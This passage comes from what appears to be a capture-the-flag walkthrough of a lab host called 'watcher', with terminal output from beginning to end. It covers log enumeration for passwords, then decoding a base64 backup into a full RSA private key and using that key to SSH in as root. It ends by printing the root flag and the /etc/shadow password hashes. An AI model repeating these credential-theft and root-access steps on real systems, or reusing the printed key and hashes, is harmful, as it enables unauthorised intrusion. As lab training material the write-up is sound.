/var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords /var/lib/lxd/server.key /var/lib/pam/password ╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs ╔══════════╣ Searching passwords inside logs (limit 70) 2020-08-06 22:35:30 install base-passwd:amd64 <none> 3.5.44 2020-08-06 22:35:30 status half-installed base-passwd:amd64 3.5.44 2020-08-06 22:35:31 configure base-passwd:amd64 3.5.44 3.5.44 2020-08-06 22:35:31 status half-configured base-passwd:amd64 3.5.44 2020-08-06 22:35:31 status unpacked base-passwd:amd64 3.5.44 2020-08-06 22:35:32 status installed base-passwd:amd64 3.5.44 2020-08-06 22:35:38 status half-configured base-passwd:amd64 3.5.44 2020-08-06 22:35:38 status half-installed base-passwd:amd64 3.5.44 2020-08-06 22:35:38 status unpacked base-passwd:amd64 3.5.44 2020-08-06 22:35:38 upgrade base-passwd:amd64 3.5.44 3.5.44 2020-08-06 22:35:44 install passwd:amd64 <none> 1:4.5-1ubuntu1 2020-08-06 22:35:44 status half-installed passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:35:44 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:35:45 configure base-passwd:amd64 3.5.44 <none> 2020-08-06 22:35:45 status half-configured base-passwd:amd64 3.5.44 2020-08-06 22:35:45 status installed base-passwd:amd64 3.5.44 2020-08-06 22:35:45 status unpacked base-passwd:amd64 3.5.44 2020-08-06 22:35:46 configure passwd:amd64 1:4.5-1ubuntu1 <none> 2020-08-06 22:35:46 status half-configured passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:35:46 status installed passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:35:46 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:37:45 configure passwd:amd64 1:4.5-1ubuntu2 <none> 2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu2 2020-08-06 22:37:45 status half-installed passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:37:45 status installed passwd:amd64 1:4.5-1ubuntu2 2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu1 2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu2 2020-08-06 22:37:45 upgrade passwd:amd64 1:4.5-1ubuntu1 1:4.5-1ubuntu2 2020-12-03 01:34:42,245 - util.py[DEBUG]: Writing to /var/lib/cloud/instances/iid-datasource-none/sem/config_set_passwords - wb: [644] 25 bytes 2020-12-03 01:34:42,246 - ssh_util.py[DEBUG]: line 123: option PasswordAuthentication added with yes 2020-12-03 01:34:42,305 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon. 2020-12-03 01:34:42,305 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords ran successfully 2020-12-03 01:35:23,988 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 01:35:23,988 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 02:11:13,408 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 02:11:13,408 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 02:15:26,570 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 02:15:26,570 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 02:28:34,504 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 02:28:34,504 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 02:38:54,645 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 02:38:54,645 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 03:25:19,195 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 03:25:19,195 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-03 21:29:46,919 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-03 21:29:46,919 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-12 15:21:21,996 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-12 15:21:21,996 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2020-12-12 15:52:17,126 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2020-12-12 15:52:17,126 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) 2023-03-15 21:20:15,502 - handlers.py[DEBUG]: finish: modules-config/config-set-passwords: SUCCESS: config-set-passwords previously ran 2023-03-15 21:20:15,502 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance) base-passwd depends on libc6 (>= 2.8); however: base-passwd depends on libdebconfclient0 (>= 0.145); however: Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/system@0005b585ee67923d-9c5fd83b91fe8512.journal~ matches Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/system.journal matches Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/user-1000.journal matches Binary file /var/log/journal/ec6c05333ff74080b8bd26a785d12724/user-1002.journal matches Dec 03 01:31:11 ubuntu-server chage[14591]: changed password expiry for sshd Dec 03 01:31:11 ubuntu-server usermod[14586]: change user 'sshd' password Dec 12 15:21:16 watcher kernel: [ 6.839382] systemd[1]: Started Forward Password Requests to Wall Directory Watch. Dec 12 15:21:16 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch. Dec 12 15:22:41 watcher sshd[2566]: Accepted password for will from 192.168.153.128 port 37134 ssh2 Dec 12 15:52:14 watcher kernel: [ 9.796182] systemd[1]: Started Forward Password Requests to Wall Directory Watch. Dec 12 15:52:14 watcher sudo: root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/touch /var/log/aws114_ssm_agent_installation.log Dec 12 15:52:14 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch. Dec 3 01:34:39 watcher systemd[1]: Started Dispatch Password Requests to Console Directory Watch. Dec 3 01:35:22 watcher kernel: [ 4.333882] systemd[1]: Started Forward Password Requests to Wall Directory Watch. Dec 3 01:38:37 watcher sshd[1296]: Accepted password for will from 192.168.153.128 port 55674 ssh2 ╔════════════════╗ ════════════════════════════════╣ API Keys Regex ╠════════════════════════════════ ╚════════════════╝ Regexes to search for API keys aren't activated, use param '-r' will@watcher:/tmp$ cd /opt/backups/ cd /opt/backups/ will@watcher:/opt/backups$ ls ls key.b64 will@watcher:/opt/backups$ cat key.b64 cat key.b64 LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBelBhUUZvbFFx OGNIb205bXNzeVBaNTNhTHpCY1J5QncrcnlzSjNoMEpDeG5WK2FHCm9wWmRjUXowMVlPWWRqWUlh WkVKbWRjUFZXUXAvTDB1YzV1M2lnb2lLMXVpWU1mdzg1ME43dDNPWC9lcmRLRjQKanFWdTNpWE45 ZG9CbXIzVHVVOVJKa1ZuRER1bzh5NER0SXVGQ2Y5MlpmRUFKR1VCMit2Rk9ON3E0S0pzSXhnQQpu TThrajhOa0ZrRlBrMGQxSEtIMitwN1FQMkhHWnJmM0RORm1RN1R1amEzem5nYkVWTzdOWHgzVjNZ T0Y5eTFYCmVGUHJ2dERRVjdCWWI2ZWdrbGFmczRtNFhlVU8vY3NNODRJNm5ZSFd6RUo1enBjU3Jw bWtESHhDOHlIOW1JVnQKZFNlbGFiVzJmdUxBaTUxVVIvMndOcUwxM2h2R2dscGVQaEtRZ1FJREFR QUJBb0lCQUhtZ1RyeXcyMmcwQVRuSQo5WjVnZVRDNW9VR2padjdtSjJVREZQMlBJd3hjTlM4YUl3 YlVSN3JRUDNGOFY3cStNWnZEYjNrVS80cGlsKy9jCnEzWDdENTBnaWtwRVpFVWVJTVBQalBjVU5H VUthWG9hWDVuMlhhWUJ0UWlSUjZaMXd2QVNPMHVFbjdQSXEyY3oKQlF2Y1J5UTVyaDZzTnJOaUpR cEdESkRFNTRoSWlnaWMvR3VjYnluZXpZeWE4cnJJc2RXTS8wU1VsOUprbkkwUQpUUU9pL1gyd2Z5 cnlKc20rdFljdlk0eWRoQ2hLKzBuVlRoZWNpVXJWL3drRnZPRGJHTVN1dWhjSFJLVEtjNkI2CjF3 c1VBODUrdnFORnJ4ekZZL3RXMTg4VzAwZ3k5dzUxYktTS0R4Ym90aTJnZGdtRm9scG5Gdyt0MFFS QjVSQ0YKQWxRSjI4a0NnWUVBNmxyWTJ4eWVMaC9hT0J1OStTcDN1SmtuSWtPYnBJV0NkTGQxeFhO dERNQXo0T3FickxCNQpmSi9pVWNZandPQkh0M05Oa3VVbTZxb0VmcDRHb3UxNHlHek9pUmtBZTRI UUpGOXZ4RldKNW1YK0JIR0kvdmoyCk52MXNxN1BhSUtxNHBrUkJ6UjZNL09iRDd5UWU3OE5kbFF2 TG5RVGxXcDRuamhqUW9IT3NvdnNDZ1lFQTMrVEUKN1FSNzd5UThsMWlHQUZZUlhJekJncDVlSjJB QXZWcFdKdUlOTEs1bG1RL0UxeDJLOThFNzNDcFFzUkRHMG4rMQp2cDQrWThKMElCL3RHbUNmN0lQ TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo= ┌──(witty㉿kali)-[~/Downloads] └─$ echo ".... TWVpWDgwWUpXN0x0b3pyNytzZmJBUVoxVGEybzFoQ2FsQVF5SWs5cCtFWHBJClViQlZueVVDMVhj dlJmUXZGSnl6Z2Njd0V4RXI2Z2xKS09qNjRiTUNnWUVBbHhteC9qeEtaTFRXenh4YjlWNEQKU1Bz K055SmVKTXFNSFZMNFZUR2gydm5GdVR1cTJjSUM0bTUzem4reEo3ZXpwYjFyQTg1SnREMmduajZu U3I5UQpBL0hiakp1Wkt3aTh1ZWJxdWl6b3Q2dUZCenBvdVBTdVV6QThzOHhIVkk2ZWRWMUhDOGlw NEptdE5QQVdIa0xaCmdMTFZPazBnejdkdkMzaEdjMTJCcnFjQ2dZQWhGamkzNGlMQ2kzTmMxbHN2 TDRqdlNXbkxlTVhuUWJ1NlArQmQKYktpUHd0SUcxWnE4UTRSbTZxcUM5Y25vOE5iQkF0aUQ2L1RD WDFrejZpUHE4djZQUUViMmdpaWplWVNKQllVTwprSkVwRVpNRjMwOFZuNk42L1E4RFlhdkpWYyt0 bTRtV2NOMm1ZQnpVR1FIbWI1aUpqa0xFMmYvVHdZVGcyREIwCm1FR0RHd0tCZ1FDaCtVcG1UVFJ4 NEtLTnk2d0prd0d2MnVSZGo5cnRhMlg1cHpUcTJuRUFwa2UyVVlsUDVPTGgKLzZLSFRMUmhjcDlG bUY5aUtXRHRFTVNROERDYW41Wk1KN09JWXAyUloxUnpDOUR1ZzNxa3R0a09LQWJjY0tuNQo0QVB4 STFEeFUrYTJ4WFhmMDJkc1FIMEg1QWhOQ2lUQkQ3STVZUnNNMWJPRXFqRmRaZ3Y2U0E9PQotLS0t LUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=" | base64 -d -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAzPaQFolQq8cHom9mssyPZ53aLzBcRyBw+rysJ3h0JCxnV+aG opZdcQz01YOYdjYIaZEJmdcPVWQp/L0uc5u3igoiK1uiYMfw850N7t3OX/erdKF4 jqVu3iXN9doBmr3TuU9RJkVnDDuo8y4DtIuFCf92ZfEAJGUB2+vFON7q4KJsIxgA nM8kj8NkFkFPk0d1HKH2+p7QP2HGZrf3DNFmQ7Tuja3zngbEVO7NXx3V3YOF9y1X eFPrvtDQV7BYb6egklafs4m4XeUO/csM84I6nYHWzEJ5zpcSrpmkDHxC8yH9mIVt dSelabW2fuLAi51UR/2wNqL13hvGglpePhKQgQIDAQABAoIBAHmgTryw22g0ATnI 9Z5geTC5oUGjZv7mJ2UDFP2PIwxcNS8aIwbUR7rQP3F8V7q+MZvDb3kU/4pil+/c q3X7D50gikpEZEUeIMPPjPcUNGUKaXoaX5n2XaYBtQiRR6Z1wvASO0uEn7PIq2cz BQvcRyQ5rh6sNrNiJQpGDJDE54hIigic/GucbynezYya8rrIsdWM/0SUl9JknI0Q TQOi/X2wfyryJsm+tYcvY4ydhChK+0nVTheciUrV/wkFvODbGMSuuhcHRKTKc6B6 1wsUA85+vqNFrxzFY/tW188W00gy9w51bKSKDxboti2gdgmFolpnFw+t0QRB5RCF AlQJ28kCgYEA6lrY2xyeLh/aOBu9+Sp3uJknIkObpIWCdLd1xXNtDMAz4OqbrLB5 fJ/iUcYjwOBHt3NNkuUm6qoEfp4Gou14yGzOiRkAe4HQJF9vxFWJ5mX+BHGI/vj2 Nv1sq7PaIKq4pkRBzR6M/ObD7yQe78NdlQvLnQTlWp4njhjQoHOsovsCgYEA3+TE 7QR77yQ8l1iGAFYRXIzBgp5eJ2AAvVpWJuINLK5lmQ/E1x2K98E73CpQsRDG0n+1 vp4+Y8J0IB/tGmCf7IPMeiX80YJW7Ltozr7+sfbAQZ1Ta2o1hCalAQyIk9p+EXpI UbBVnyUC1XcvRfQvFJyzgccwExEr6glJKOj64bMCgYEAlxmx/jxKZLTWzxxb9V4D SPs+NyJeJMqMHVL4VTGh2vnFuTuq2cIC4m53zn+xJ7ezpb1rA85JtD2gnj6nSr9Q A/HbjJuZKwi8uebquizot6uFBzpouPSuUzA8s8xHVI6edV1HC8ip4JmtNPAWHkLZ gLLVOk0gz7dvC3hGc12BrqcCgYAhFji34iLCi3Nc1lsvL4jvSWnLeMXnQbu6P+Bd bKiPwtIG1Zq8Q4Rm6qqC9cno8NbBAtiD6/TCX1kz6iPq8v6PQEb2giijeYSJBYUO kJEpEZMF308Vn6N6/Q8DYavJVc+tm4mWcN2mYBzUGQHmb5iJjkLE2f/TwYTg2DB0 mEGDGwKBgQCh+UpmTTRx4KKNy6wJkwGv2uRdj9rta2X5pzTq2nEApke2UYlP5OLh /6KHTLRhcp9FmF9iKWDtEMSQ8DCan5ZMJ7OIYp2RZ1RzC9Dug3qkttkOKAbccKn5 4APxI1DxU+a2xXXf02dsQH0H5AhNCiTBD7I5YRsM1bOEqjFdZgv6SA== -----END RSA PRIVATE KEY----- ┌──(witty㉿kali)-[~/Downloads] └─$ nano will_idrsa ┌──(witty㉿kali)-[~/Downloads] └─$ chmod 600 will_idrsa ┌──(witty㉿kali)-[~/Downloads] └─$ ssh -i will_idrsa root@10.10.46.15 The authenticity of host '10.10.46.15 (10.10.46.15)' can't be established. ED25519 key fingerprint is SHA256:/60sf9gTocupkmAaJjtQJTxW1ZnolBZckE6KpPiQi5s. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.46.15' (ED25519) to the list of known hosts. Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-128-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information disabled due to load higher than 1.0 33 packages can be updated. 0 updates are security updates. Last login: Thu Dec 3 03:25:38 2020 root@watcher:~# ls flag_7.txt root@watcher:~# cat flag_7.txt FLAG{who_watches_the_watchers} root@watcher:~# ls -lah total 40K drwx------ 6 root root 4.0K Dec 3 2020 . drwxr-xr-x 24 root root 4.0K Dec 12 2020 .. lrwxrwxrwx 1 root root 9 Dec 3 2020 .bash_history -> /dev/null -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc drwx------ 2 root root 4.0K Dec 3 2020 .cache -rw-r--r-- 1 root root 31 Dec 3 2020 flag_7.txt drwx------ 3 root root 4.0K Dec 3 2020 .gnupg drwxr-xr-x 3 root root 4.0K Dec 3 2020 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 66 Dec 3 2020 .selected_editor drwx------ 2 root root 4.0K Dec 3 2020 .ssh root@watcher:~# cat .bash_history root@watcher:~# cat /etc/shadow root:$6$UseANeHi$f02vVBMbk9b5LRepJhjdhquXMJ6aBOi1IwQ3EJqF.dbhC0XCNDcZ4kmCVxR.3vNKr4ol0HzTIYXR6ATpYjDwJ1:18599:0:99999:7::: daemon:*:18480:0:99999:7::: bin:*:18480:0:99999:7::: sys:*:18480:0:99999:7::: sync:*:18480:0:99999:7::: games:*:18480:0:99999:7::: man:*:18480:0:99999:7::: lp:*:18480:0:99999:7::: mail:*:18480:0:99999:7::: news:*:18480:0:99999:7::: uucp:*:18480:0:99999:7::: proxy:*:18480:0:99999:7::: www-data:*:18480:0:99999:7::: backup:*:18480:0:99999:7::: list:*:18480:0:99999:7::: irc:*:18480:0:99999:7::: gnats:*:18480:0:99999:7::: nobody:*:18480:0:99999:7::: systemd-network:*:18480:0:99999:7::: systemd-resolve:*:18480:0:99999:7::: syslog:*:18480:0:99999:7::: messagebus:*:18480:0:99999:7::: _apt:*:18480:0:99999:7::: lxd:*:18480:0:99999:7::: uuidd:*:18480:0:99999:7::: dnsmasq:*:18480:0:99999:7::: landscape:*:18480:0:99999:7::: pollinate:*:18480:0:99999:7::: sshd:*:18599:0:99999:7::: will:$6$PMxyf2rOO/k.yQyc$o5EbluoIAvLUeOivGTHqx6opAGuHit2d8wBWtFD7xWyJBTt680a/7917Wcg6fi83ubwnFhWFlPmYJjRKWwp0m.:18599:0:99999:7::: ftp:*:18599:0:99999:7::: ftpuser:$6$ag2r/3kP$9N1nbsh10Vb0WFHXGza.fnWNjbiPGiuYZ2nRGiq3/cR1SDPCyVi9GSrgeYBP/9wfzsFvRsIL3cJIsFUCL1741.:18599:0:99999:7::: mat:$6$yCP235ym$3EE8j2pgbseXTOvIOA23rWHGzO3UesHWdOUoesyJFpCkHmUwspwyPtbxUCvfuba8yi69LrYIMJnyUjJ07M1M21:18599:0:99999:7::: toby:$6$c9ZzrH1h$KII6cn/29vuk2cSxA5HC56UJ9BfRhmIDapaB2Bpkb7LATFQtVThblvo5f8Po2FmODE0a4pBcC7SNxlYnFkXO8.:18599:0:99999:7:::